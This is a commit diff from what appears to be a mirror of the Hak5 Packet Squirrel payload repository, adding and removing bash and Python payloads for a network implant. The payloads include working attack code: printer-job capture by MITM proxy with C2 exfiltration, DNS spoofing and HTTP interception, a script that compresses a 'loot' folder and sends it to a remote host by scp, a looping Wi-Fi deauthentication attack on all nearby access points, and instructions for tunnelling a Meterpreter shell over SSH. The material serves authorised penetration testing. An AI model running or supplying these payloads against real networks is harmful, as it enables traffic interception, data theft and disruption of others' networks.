HAK5/packetsquirrel-payloads
1
0
Fork 0
mirror of https://github.com/hak5/packetsquirrel-payloads.git synced 2025-12-19 09:48:47 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update repos for Packet Squirrel Mk 2 release

Browse Source
This commit is contained in:
Mike Kershaw / Dragorn
2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

53
payloads/exfiltration/pcl_printer/payload Executable file
View File

@@ -0,0 +1,53 @@
#!/bin/bash
# Title: PCL Printer Capture
# Description: Capture PCL IP printer jobs with a dynamic proxy
# Author: Hak5
# To convert PCL files to PDF, use a tool like GhostPCL:
# https://ghostscript.com/releases/gpcldnld.html
#
# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something
# like:
# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream
# Do we automatically exfiltrate to Cloud C2? Uncomment to send files to your
# CloudC2 server automatically
#
# USE_C2=1
# By default, C2WATCHDIR removes files after they're sent. To keep them, uncomment
# C2_KEEP_FILES below
#
# C2_KEEP_FILES=1
LED SETUP
NETMODE NAT
# We have to have attached USB
USB_WAIT
# Make sure the directory exists
mkdir /usb/printer/
# If USE_C2 isn't empty, we're uploading to CloudC2
if [[ ! -z "$USE_C2" ]]; then
# If C2_KEEP_FILES is not empty, we want to preserve the
# files on USB, otherwise run C2WATCHDIR normally and delete
# the files after they are sent.
if [[ ! -z "$C2_KEEP_FILES" ]]; then
C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ &
else
C2WATCHDIR /usb/printer/ &
fi
# Give C2WATCHDIR a moment to sync any old files that were present
sleep 3
fi
LED ATTACK
# Use a dynamic proxy to MITM standard PCL IP printers
DYNAMICPROXY CLIENT /usb/printer/print_ 9100

32
payloads/general/gatekeeper/payload Executable file
View File

@@ -0,0 +1,32 @@
#!/bin/bash
# Title: Gatekeeper
#
# Description: Toggle access to the network with the pushbutton
# Author: Hak5
# Set the default network mode (such as NAT or BRIDGE)
NETWORK_MODE="BRIDGE"
NETMODE ${NETWORK_MODE}
LED G SOLID
while true; do
# Run the buttom command with no LED; this way the LED stays
# solid green
NO_LED=1 BUTTON
# Check the existing network mode; if we're not the right mode,
# send the target device to jail
if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then
LED R FAST
NETMODE JAIL
LED R SOLID
else
# Set the network mode back to our normal mode
LED G FAST
NETMODE ${NETWORK_MODE}
LED G SOLID
fi
done

14
payloads/interception/dns_sinkhole/payload Executable file
View File

@@ -0,0 +1,14 @@
#!/bin/bash
# Title: DNS Sinkhole
# Description: Demonstrate sinkholing a DNS domain (hak5.org)
# Author: Hak5
# This payload will intercept any requests for a *.hak5.org domain
# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6)
NETMODE BRIDGE
LED R SINGLE
SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1'

30
payloads/interception/web_intercept/payload Executable file
View File

@@ -0,0 +1,30 @@
#!/bin/bash
# Title: Minimalistic web intercept
# Description: Replace HTTP with Squirrels.
# Author: Hak5
#
# squirrel.jpg from Wikipedia
# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg
# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen
# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion,
# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0,
# https://commons.wikimedia.org/w/index.php?curid=10213698
NETMODE NAT
LED B SOLID
# Add a web payload to the nftables
nft add table ip webpayload
# Hook prerouting
nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; }
# Redirect port 80 to our local 8080
nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080
while true;
do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \
cat - /root/payloads/$(SWITCH)/squirrel.jpg | \
netcat -l -p 8080;
done

BIN
payloads/interception/web_intercept/squirrel.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 132 KiB

35
payloads/library/exfiltration/Email-Sender/README.md
View File

@@ -1,35 +0,0 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | Email-Sender |
| **Description** | Sends emails / has html and file support / it can be used with bash and python . |
**Author** | TheDragonkeeper |
| **Version** | 1.1 |
| **Category** | Exfiltration |
| **Target** | Any |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Blink Green | Payload ended complete |
| SETUP: | Blink Yellow | Payload is waiting on network |
| Command | Arguments |
:----------|:-----------------|
| SENDMAIL | $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE" |
Running the payload will install the command to /usr/bin
this will allow you to use the command SENDMAIL to send an email using your bash payload
the default arguments are as follows.
| $1 | $2 | $3 | $4 | $5 | $6 | $7 | $8
|:----------|:----------|:-----------------|:----------|:----------|:-----------------|:----------|:-----------------:|
| $FROM |$RCPT |"$SUBJECT"| "$BODY"| $SERVER | $USER | $PASS |"$FILE" |
if you wish to hard code one of these values you can simply edit the SENDMAIL file and then drop the numbers down a value;
i.e if you change $1 to 'thisismyemail@somedomain.net' then $2 now needs to be $1
The other option is to edit the python file 'sendemail.py' and change the corresponding sys.argv[1] in the same way.
but then you need to make sure you also edit the SENDMAIL to only send the amount of arguments needed.

7
payloads/library/exfiltration/Email-Sender/SENDMAIL
View File

@@ -1,7 +0,0 @@
#!/bin/bash
[[ -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7"
[[ ! -z $8 ]] && python /usr/bin/sendemail.py "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8"
### $1 $2 $3 $4 $5 $6 $7 $8
### $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE"

28
payloads/library/exfiltration/Email-Sender/payload.sh
View File

@@ -1,28 +0,0 @@
#!/bin/bash
function run() {
LED STAGE1
SWITCH_POS=$(SWITCH)
until ping -c 1 8.8.8.8 >/dev/null ; do : ; done
SUBJECT='Im Just Nutty'
BODY='And your network is nutty too.'
RCPT="recieving email"
FROM="your email"
SERVER="server.com"
USER="username"
PASS="password"
FILE="/some/File/Path/1.txt"
SENDMAIL $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE"
####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH
LED FINISH
}
if [ ! -f /usr/bin/SENDMAIL ]; then
mv /root/payloads/$(SWITCH)/sendemail.py /usr/bin/
mv /root/payloads/$(SWITCH)/SENDMAIL /usr/bin/
chmod +rx /usr/bin/SENDMAIL
fi
NETMODE NAT
run

92
payloads/library/exfiltration/Email-Sender/sendemail.py
View File

@@ -1,92 +0,0 @@
# Title: Email-Sender
# Description: Allows sending emails to a mail server, with file support
# this is called using the Email-Sender library
# Author: TheDragonkeeper
# Version: 1.1
# Category: exfiltration
# Target: Any
import sys
import smtplib, os
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
from email.Utils import COMMASPACE, formatdate
from email import Encoders
import ConfigParser
def send_mail(send_from, send_to, subject, text, files=None,
data_attachments=None, server="None", port=587,
tls=True, html=False, images=None,
username=None, password=None,
config_file=None, config=None):
if files is None:
files = []
if images is None:
images = []
if data_attachments is None:
data_attachments = []
if config_file is not None:
config = ConfigParser.ConfigParser()
config.read(config_file)
if config is not None:
server = config.get('smtp', 'server')
port = config.get('smtp', 'port')
tls = config.get('smtp', 'tls').lower() in ('true', 'yes', 'y')
username = config.get('smtp', 'username')
password = config.get('smtp', 'password')
msg = MIMEMultipart('related')
msg['From'] = send_from
msg['To'] = send_to if isinstance(send_to, basestring) else COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText(text, 'html' if html else 'plain') )
for f in files:
part = MIMEBase('application', "octet-stream")
part.set_payload( open(f,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
msg.attach(part)
for f in data_attachments:
part = MIMEBase('application', "octet-stream")
part.set_payload( f['data'] )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % f['filename'])
msg.attach(part)
for (n, i) in enumerate(images):
fp = open(i, 'rb')
msgImage = MIMEImage(fp.read())
fp.close()
msgImage.add_header('Content-ID', '<image{0}>'.format(str(n+1)))
msg.attach(msgImage)
smtp = smtplib.SMTP(server, int(port))
if tls:
smtp.starttls()
if username is not None:
smtp.login(username, password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
if len(sys.argv) > 8:
send_mail(sys.argv[1], sys.argv[2],
sys.argv[3],
sys.argv[4],
server=sys.argv[5], username=sys.argv[6], password=sys.argv[7], files=[sys.argv[8]])
else:
send_mail(sys.argv[1], sys.argv[2],
sys.argv[3],
sys.argv[4],
server=sys.argv[5], username=sys.argv[6], password=sys.argv[7])

67
payloads/library/exfiltration/FreeDaNutz/README.md
View File

@@ -1,67 +0,0 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | FreeDaNutz |
| **Description** | This payload will compress the loot folder and then send that file to a remote server via scp |
| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
| **Version** | 1.0 |
| **Category** | exfiltration |
| **Target** | Any |
| **Net Mode** | NAT |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Rapid White | Payload is shutting down |
| FAIL: | Red | No USB storage found |
| | Red | Cannot send files to remote host |
| | Red | Cannot ping remote host |
| ATTACK: | Blink Yellow | Payload is launching |
| | Rapid Cyan | Compressing Loot Folder |
| | Rapid Magenta | Sending Compressed File |
### **Description**
This payload will compress the entire /mnt/loot folder. It will then send via scp that folder to a host you specify. This payload runs some checks to make sure things are set up correctly before it attempts to send any data over the network. If fatal errors occur then trouble shooting data is dumped into /mnt/loot/freedanutz/log.txt
### **Requirements**
+ USB access to get loot folder and to log messages.
### **SSH Setup**
1. SSH to the Squirrel
2. run: mkdir /root/.ssh
3. run: ssh-keygen -t rsa -N "" -f /root/.ssh/id_rsa
4. run: chmod 600 /root/.ssh/id_rsa
5. run: cat /root/.ssh/id__rsa.pub | ssh user@remotehost 'cat >> .ssh/authorized_keys'
6. make sure it works:
ssh user@remotehost
Notes: The first time you may have to type "yes" to accept. Afterwards you shouldn't have to do this step.
### **Payload Setup**
1. Edit the config variables at the top.
The main variables are:
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
exfilhostuser="root" # The username of the account for the above hostname
sshport="22" # Port to send data out on
exfilfile="backup.tar.gz" # The name of the compressed loot folder
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
lootfolderpath="/mnt/loot" # Path to loot folder
payloadlogpath="/mnt/loot/freedanutz"# Path to store payload log file
2. Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
3. Connect into a target machine with access to the LAN.
4. Set switch to the <n> spot and power up.
5. Leave, get coffee, take a nap while the payload runs.
6. When all is done the LED will just go blank. It is now safe to unplug and go about your day.
Enjoy!

204
payloads/library/exfiltration/FreeDaNutz/payload.sh
View File

@@ -1,204 +0,0 @@
#!/bin/bash
#
# Title: FreeDaNutz
# Description: This payload will compress the loot folder and then send that file to a remote server via scp
# Author: infoskirmish.com
# Version: 1.0
# Category: exfiltration
# Target: Any
# Net Mode: NAT
# LEDs
# FAIL: This payload will LED FAIL (blink RED) for the following reasons
# No USB storage found
# Cannot send files to remote host
# Cannot ping remote host
# ATTACK: Setting NAT: Blink Yellow
# Compressing: Rapid Cyan
# Sending: Rapid Magenta
# Cleaning up: Rapid White
# SUCCESS: LED goes off
exfilhost="xx.xx.xx.xx" # The hostname or ip address you want to send the data to.
exfilhostuser="root" # The username of the account for the above hostname
sshport="22" # Port to send data out on
exfilfile="backup.tar.gz" # The name of the compressed loot folder
identityfile="/root/.ssh/id_rsa" # Path to private identity file on the squirrel
remotepath="/root/$exfilfile" # Path to filename (include file name) on the remote machine.
exfilfilepath="/mnt/$exfilfile" # Location to temp store compressed loot (this gets sent)
lootfolderpath="/mnt/loot" # Path to loot folder
payloadlogpath="/mnt/loot/freedanutz" # Path to store payload log file
# The main run function.
# Inputs: None
# Returns: None
# Upon success it will call the finish() function to shutdown.
function run() {
# Create log directory
# We store the tarball on /mnt outside the /mnt/loot folder in order to make sure we do not use up all the limited space on the device itself.
if [ ! -d $payloadlogpath ]; then
# If log path does not exisit then we should create it.
mkdir -p $payloadlogpath &> /dev/null
fi
# Set networking to NAT mode and wait eight seconds
NETMODE NAT
sleep 8
# If we cannot reach the server we want to send our data to then there is no point in going any further.
ping $exfilhost -w 3 &> /dev/null
pingtest=$?
if [ $pingtest -ne 0 ]; then
debugdata
fail "FATAL ERROR: Cannot reach $exfilhost"
fi
# Let's test to make sure scp keys are set up correclty and we can send files before we send loot.
testssh
# Start blinking LED Cyan very fast to indicate compressing is in progress.
LED C VERYFAST
# Compress the loot folder
echo "tar -czf $exfilfilepath $lootfolderpath" >> $payloadlogpath/log.txt
tar -czf $exfilfilepath $lootfolderpath &> /dev/null
# Start blinking LED Magenta very fast to indicate sending is in progress.
LED M VERYFAST
# Send compress file out into the world.
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath &> /dev/null
# Clean up
finish
}
# A function to clean up files and safely shutdown
# Inputs: None
# Returns: None
function finish() {
# Remove the file we have sent out as it is no longer needed and just taking up space.
echo "Removing $exfilfilepath" >> $payloadlogpath/log.txt
rm $exfilfilepath
sync
# Halt the system; turn off LED
LED OFF
halt
}
# A function to test if the payload can send files to the remote host.
# Inputs: None
# Returns: None
# On test fail will abort script.
function testssh() {
# Create test file.
touch $exfilfilepath.test
scp -P $sshport -C -i $identityfile $exfilfilepath.test $exfilhostuser@$exfilhost:$remotepath &> /dev/null
error=$?
if [ $error -ne 0 ]; then
# We could not send test file; this is a fatal error.
rm $exfilfilepath.test
debugdata
fail "FATAL ERROR: Could not access and/or login to $exfilhostuser@$exfilhost remove path = $remotepath"
else
# Be nice and try to remove the test file we uploaded.
ssh $exfilhostuser@$exfilhost 'rm $remotepath.test'
rm $exfilfilepath.test
fi
}
# A function to standardize how fatal errors fail.
# Inputs: $1:Error message
# Returns: None
# This will abort the script.
function fail() {
LED FAIL
echo $1 >> $payloadlogpath/log.txt
sync
halt
}
# A function to dump data to aid in trouble shooting problems.
# Inputs: None
# Returns: None
function debugdata() {
echo "=== DEBUG DATA ===" >> $payloadlogpath/log.txt
ifconfig >> $payloadlogpath/log.txt
echo "=== Scp Command ===" >> $payloadlogpath/log.txt
echo "scp -P $sshport -C -i $identityfile $exfilfilepath $exfilhostuser@$exfilhost:$remotepath" >> $payloadlogpath/log.txt
echo "=== Tar Command ===" >> $payloadlogpath/log.txt
echo "tar -czf $exfilfilepath $lootfolderpath &> /dev/null" >> $payloadlogpath/log.txt
echo "=== Public Key Dump ===" >> $payloadlogpath/log.txt
cat $identityfile.pub >> $payloadlogpath/log.txt
echo "=== Network Config Dump ===" >> $payloadlogpath/log.txt
cat /etc/config/network >> $payloadlogpath/log.txt
echo "=== Ping $exfilhost Results ===" >> $payloadlogpath/log.txt
echo "If there is no data it likely means that $exfilhost is a bad address." >> $payloadlogpath/log.txt
ping $exfilhost -w 3 >> $payloadlogpath/log.txt
echo "=== lsusb Dump ===" >> $payloadlogpath/log.txt
lsusb >> $payloadlogpath/log.txt
}
# Zero out payload log file.
echo "" > $payloadlogpath/log.txt
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Check to see if the .ssh folder exists. If it does not exist then create it.
if [ ! -d "/root/.ssh" ]; then
# If it doesn't then we need to create it.
echo "Warning: /root/.ssh folder did not exits. We created it." >> $payloadlogpath/log.txt
mkdir -p /root/.ssh &> /dev/null
fi
# Check if identity file exists. If not create it.
if [ ! -f $identityfile ]; then
# We need to log a warning that since the identify file was not found then this payload likely will fail. This payload will give the user a likely way to fix this problem.
echo "Warning: We had to create $identityfile" >> $payloadlogpath/log.txt
echo "To complete setup you'll likely need to run this command on the squirrel (make sure when you do your squirrel can access $exfilhost)" >> $payloadlogpath/log.txt
echo "cat $identityfile.pub | ssh $exfilhostuser@$exfilhost 'cat >> .ssh/authorized_keys'" >> $payloadlogpath/log.txt
ssh-keygen -t rsa -N "" -f $identityfile
fi
LED ATTACK
run
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
payloadlogpath="log.txt"
debugdata
fail "Could not load USB storage. Stopping..."
fi

26
payloads/library/general/I-Hate-Wifi/README.md
View File

@@ -1,26 +0,0 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** |I Hate Wifi |
| **Description** | Deauths all wifi clients in the area with option to exclude your own . |
**Author** | TheDragonkeeper |
| **Version** | 1.0 |
| **Category** | General |
| **Target** | Any |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| Waiting: | Blinking yellow | Waiting on network - getting requirements |
| Failed: | Flashing Red | Failed to get package |
| Scanning: | Green | Scanning for Aps |
| Attacking: | Red | Deauthing targets |
| Done: | Blue | Sleeping |
| Requires |
|:----------|
| Aircrack-ng |
| usb wifi dongle |
| Fw 1.1 + |
| Options | Line | Result |
|:----------|:----------|:----------|
| YOUR_AP_MAC='' | 37 |Add your mac address to exclude your AP from attack |

39
payloads/library/general/I-Hate-Wifi/payload.sh
View File

@@ -1,39 +0,0 @@
#!/bin/bash
function scan() {
LED G
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up
AP_LIST=$(iwlist wlan0 scan | grep Address | awk '{ print $5 }')
}
function attack() {
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
LED R
for a in $AP_LIST
do
if [ $a != $YOUR_AP_MAC ]; then
aireplay-ng -0 20 -a $a wlan0
fi
done
LED B
sleep 10
scan
attack
}
if [ ! -f '/usr/sbin/aireplay-ng' ] ; then
LED STAGE1
NETMODE NAT
until ping -c 1 8.8.8.8 >/dev/null ; do : ; done
opkg install aircrack-ng || LED FAIL
LED SETUP
AP_LIST=''
############ You can change this Variable to allow your AP to not be targeted
YOUR_AP_MAC='00:11:22:00:11:22'
scan
attack

30
payloads/library/general/Wake-On-Lan/README.md
View File

@@ -1,30 +0,0 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** |Wake UP! |
| **Description** | Sends a wake on lan packet to a single device or a range of IPs in a subnet. This script will take the local interface IP and netmask, calculate the broadcast address (making it plug and play on all network), find the mac address of the targets (can be noisy but its only a single ping to each) and finally send a magic packet (if mac is found) to wake the device from slumber so you can run other scripts on newly awakened devices. |
**Author** | TheDragonkeeper |
| **Version** | 1.0 |
| **Category** | General |
| **Target** | Any |
| LED MODE | Description |
|:-----------------:|:----------------------------|
| SETUP | setting network to nat |
| FAIL | Script had a fault |
| ATTACK | Loading python script |
| FINISH | Completed |
| Options | Result | Type |
|:----------|:----------|:----------|
| Set a single target or range of targets | Options line 5 in payload.sh | |
|INTERFACE='eth0' | interface of the outgoing interface | str |
|SINGLE='0' | single target or range ( 1 or 0 ) | int |
|TARGET='192.168.1.2' | single target | str |
|STARTRANGE='1' | ip range start | int |
|ENDRANGE='255' | ip range end | int |
If Option SINGLE is set to 1 then the value of TARGET is used
if Option SINGLE is set to 0 then STARTRANGE and ENDRANGE is used
Give all Options a value regardless of the value of SINGLE

20
payloads/library/general/Wake-On-Lan/payload.sh
View File

@@ -1,20 +0,0 @@
#!/bin/bash
LED STAGE1
NETMODE NAT
#### OPTIONS
INTERFACE='eth0' #interface of the outgoing interface
SINGLE='0' # single target or range ( 1 or 0 )
TARGET='192.168.1.2' # single target
STARTRANGE='1' # ip range start
ENDRANGE='255' # ip range end
####
function failedpy() {
LED FAIL
exit
}
LED ATTACK
python /root/payloads/$(SWITCH)/wol.py $INTERFACE $SINGLE $TARGET $STARTRANGE $ENDRANGE || failedpy
LED FINISH

89
payloads/library/general/Wake-On-Lan/wol.py
View File

@@ -1,89 +0,0 @@
import socket
import struct
import os
import sys
from subprocess import Popen, PIPE
import fcntl
#### OPTIONS
interface = str(sys.argv[1])
SINGLETARGET = int(sys.argv[2])
########## if SINGLETARGET is 1 WAKETARGET is used
WAKETARGET = str(sys.argv[3])
########## if SINGLETARGET is 0 ranges are used
startrange = int(sys.argv[4])
endrange = int(sys.argv[5])
####
def wake_on_lan(host, broad):
if host == '00:00:00:00:00:00':
return False
try:
macaddress = host
except:
return False
if len(macaddress) == 12:
pass
elif len(macaddress) == 12 + 5:
sep = macaddress[2]
macaddress = macaddress.replace(sep, '')
else:
raise ValueError('Incorrect MAC address format')
data = ''.join(['FFFFFFFFFFFF', macaddress * 20])
send_data = b''
for i in range(0, len(data), 2):
send_data = b''.join([send_data,
struct.pack('B', int(data[i: i + 2], 16))])
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(send_data, (broad,9))
print('sent to '+host)
return True
def get_mac(IP):
try:
Popen(["ping", "-c1", IP], stdout = PIPE)
pid = Popen(["cat", "/proc/net/arp"], stdout = PIPE )
mac = str(pid.communicate()[0]).split()
mac = mac[int(mac.index(IP)+3)]
except:
pass
return mac
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915,
struct.pack('256s', ifname)
)[20:24])
ip = str(get_ip_address(interface))
submask = socket.inet_ntoa(struct.pack(">L", (1<<32) - (1<<32>>24)))
addr = ip.split('.')
cidr = int(sum([bin(int(x)).count('1') for x in submask.split('.')]))
mask = submask.split('.')
net = []
for i in range(4):
net.append(int(addr[i]) & int(mask[i]))
for i in range(int(32 - cidr)):
net[3 - i/8] = net[3 - i/8] + (1 << (i % 8))
if SINGLETARGET == 0:
ip = ip.split('.')
exclude = str(ip[3])
del ip[3]
ip.append('x')
ip = ".".join(map(str, ip))
for num in range(startrange, endrange):
if str(num) != exclude:
wakeip = ip.replace('x', str(num))
try:
wake_on_lan(get_mac(str(wakeip)), str(".".join(map(str, net))))
except:
pass
else:
try:
wake_on_lan(get_mac(str(WAKETARGET)), str(".".join(map(str, net))))
except:
pass

23
payloads/library/general/caternet/index.html
View File

@@ -1,23 +0,0 @@
<script language="JavaScript">
<!--
function random_img(){
var kerby=new Array()
kerby[1]="kerby1.jpg"
kerby[2]="kerby2.jpg"
kerby[3]="kerby3.jpg"
kerby[4]="kerby4.jpg"
kerby[5]="kerby5.jpg"
kerby[6]="kerby6.jpg"
kerby[7]="kerby7.jpg"
kerby[8]="kerby8.jpg"
kerby[9]="kerby9.jpg"
var ry=Math.floor(Math.random()*kerby.length)
if (ry==0)
ry=1
document.write('<img src="'+kerby[ry]+'">')
}
random_img()
//-->
</script>

BIN
payloads/library/general/caternet/kerby1.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 95 KiB

BIN
payloads/library/general/caternet/kerby2.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 93 KiB

BIN
payloads/library/general/caternet/kerby3.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 96 KiB

BIN
payloads/library/general/caternet/kerby4.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 55 KiB

BIN
payloads/library/general/caternet/kerby5.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 62 KiB

BIN
payloads/library/general/caternet/kerby6.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 81 KiB

BIN
payloads/library/general/caternet/kerby7.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 64 KiB

BIN
payloads/library/general/caternet/kerby8.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 66 KiB

BIN
payloads/library/general/caternet/kerby9.JPG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 53 KiB

14
payloads/library/general/caternet/payload.sh
View File

@@ -1,14 +0,0 @@
# Title: Caternet
# Author: Hak5Darren
# Version: 1.0
# Description: Forwards all traffic to local webserver hosting cat photos.
# Props: In loving memory of Hak5Kerby
LED SETUP
NETMODE NAT
echo "address=/#/172.16.32.1" > /tmp/dnsmasq.address
/etc/init.d/dnsmasq restart
LED ATTACK
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
python -m SimpleHTTPServer 80

36
payloads/library/interception/dnsspoof/payload.sh
View File

@@ -1,36 +0,0 @@
#!/bin/bash
#
# Title: DNSSpoof
# Description: Forge replies to arbitrary DNS queries using DNSMasq
# Author: Hak5
# Version: 1.0
# Category: interception
# Target: Any
# Net Mode: NAT
function setup() {
# Show SETUP LED
LED SETUP
# Set the network mode to NAT
NETMODE NAT
sleep 5
# Copy the spoofhost file to /tmp/dnsmasq.address
cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
# Restart dnsmasq with the new configuration
/etc/init.d/dnsmasq restart
}
function run() {
# Show ATTACK LED
LED ATTACK
# Redirect all DNS traffic to ourselves
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
}
setup
run

2
payloads/library/interception/dnsspoof/spoofhost
View File

@@ -1,2 +0,0 @@
address=/#/172.16.32.1

61
payloads/library/recon/ipinfo/payload.txt
View File

@@ -1,61 +0,0 @@
#!/bin/bash
#
# Title: IP Info
# Author: Hak5Darren
# Version: 1.0
#
# Description: This payload gathers internal and external IP address info,
# including default gateway, saving the log to the loot directory and
# optionally exfiltrating the log to Cloud C2 if CLOUDC2=1
#
# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
# LED ATTACK (Yellow Blink)... Saving IP address information
# LED FAIL (Red Blink)... Failed to gather public IP address
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful
CLOUDC2=0
# Save to /root/ for internal memory
#LOOT_DIR=/root/loot/ipinfo
# Save to /mnt/ for USB drive
LOOT_DIR=/mnt/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"
function FAIL() { LED FAIL; exit; }
LED SETUP
# Make log file
mkdir -p $LOOT_DIR
LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log"
LOG="$LOOT_DIR/$LOG_FILE"
# Optionally start SSH server
/etc/init.d/sshd start
# Ask for IP address
NETMODE NAT
# Wait until Packet Squirrel has an IP address
while ! ifconfig eth1 | grep "inet addr"; do sleep 1; done
LED ATTACK
# Gather IP info and save log
INTERNALIP=$(ifconfig eth1 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'})
GATEWAY=$(route | grep default | awk {'print $2'})
PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL
echo -e "Date: $(date)\n\
Internal IP Address: $INTERNALIP\n\
Public IP Address: $PUBLICIP\n\
Gateway: $GATEWAY\n" >> $LOG
# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
LED SPECIAL
C2CONNECT
while ! pgrep cc-client; do sleep 1; done
C2EXFIL STRING $LOG IPinfo
fi
LED FINISH

50
payloads/library/remote-access/Meterpreter-via-SSH/README.md
View File

@@ -1,50 +0,0 @@
# Meterpreter-via-SSH
## Overview
This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel.
The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity.
## Operational Design Considerations
* Payload remains silent on the network until user presses the button.
* Payload stops the SSH connection if meterpreter shell fails.
* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times).
## Getting Started
Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options:
* SSH_USER - username on remote SSH server
* SSH_HOST - ip/domain of remote SSH server
In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well.
* MSF_PORT - port of meterpreter listener
### Generate SSH Key on Squirrel
You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel:
```
root@squirrel:~# ssh-keygen
```
### Allow Squirrel on SSH Server
Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file:
```
user@server:~# mkdir ~/.ssh
user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
```
### Run Metasploit with Resource
```
msf@server:~# msfconsole -r server.rc
```
## LED Definitions
1. Configure NETMODE
* Solid Magenta
2. Connect to SSH Server
* SUCCESS - Blink Amber 5 Times
* FAIL - Blink Red 2 Times
3. Launch meterpreter
* SUCCESS - Blink Cyan 1 Time
* FAIL - Blink Red 1 Time
## Hardening Recommendations
1. Use an account with limited privileges for SSH access on the server.
2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
3. Disable PasswordAuthentication in sshd_config on the server.

74
payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
View File

